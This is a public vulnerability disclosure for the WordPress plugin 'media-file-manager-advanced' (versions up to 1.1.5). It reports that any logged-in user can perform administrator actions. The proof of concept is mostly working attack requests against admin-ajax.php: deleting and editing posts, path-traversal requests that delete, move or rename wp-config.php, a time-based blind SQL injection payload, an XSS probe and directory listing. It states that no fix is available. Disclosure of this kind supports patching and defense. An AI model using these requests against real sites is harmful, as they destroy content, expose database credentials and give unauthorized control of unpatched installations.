Description "media-file-manager-advanced" suffers from executing administrator actions by any authenticated user due to weak permissions checking. an attacker can delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting. Homepage https://wordpress.org/plugins/media-file-manager-advanced/ Affected Version <= 1.1.5 Description Vulnerability Scope LFD,SQL,XSS,Site Ruining and Changing of Content. Authorization Required User Proof of Concept Post Delete http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete post: id=17 MKDIR http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir newdir=EVEXFOLDER folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER RMDIR (Dir Must Be Empty) http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir dir=EVEXFOLDER&name= not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER UNLINK http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete dir=../../&name=wp-config.php no more wp-config.php Blind SQL INJECTION http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) Sleeps for 10 seconds XSS http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen id=" Alerts(1) Update Post http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information id=34&title=New_Title&caption=bla&description=Dummy Description Move Files http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move dir_from=../../&items=wp-config.php&dir_to= now wp-config.php is in /wp-content/uploads/wp-config.php Renaming Files http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename dir=../../&from=wp-config.php&to=wp-config.txt now wp-config.php is renamed to wp-config.txt Directory Listing http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir dir=../../ will list all files and directories Fix No Fix Available at The Moment. Time line Notified Vendor - No Reply Publish Disclosure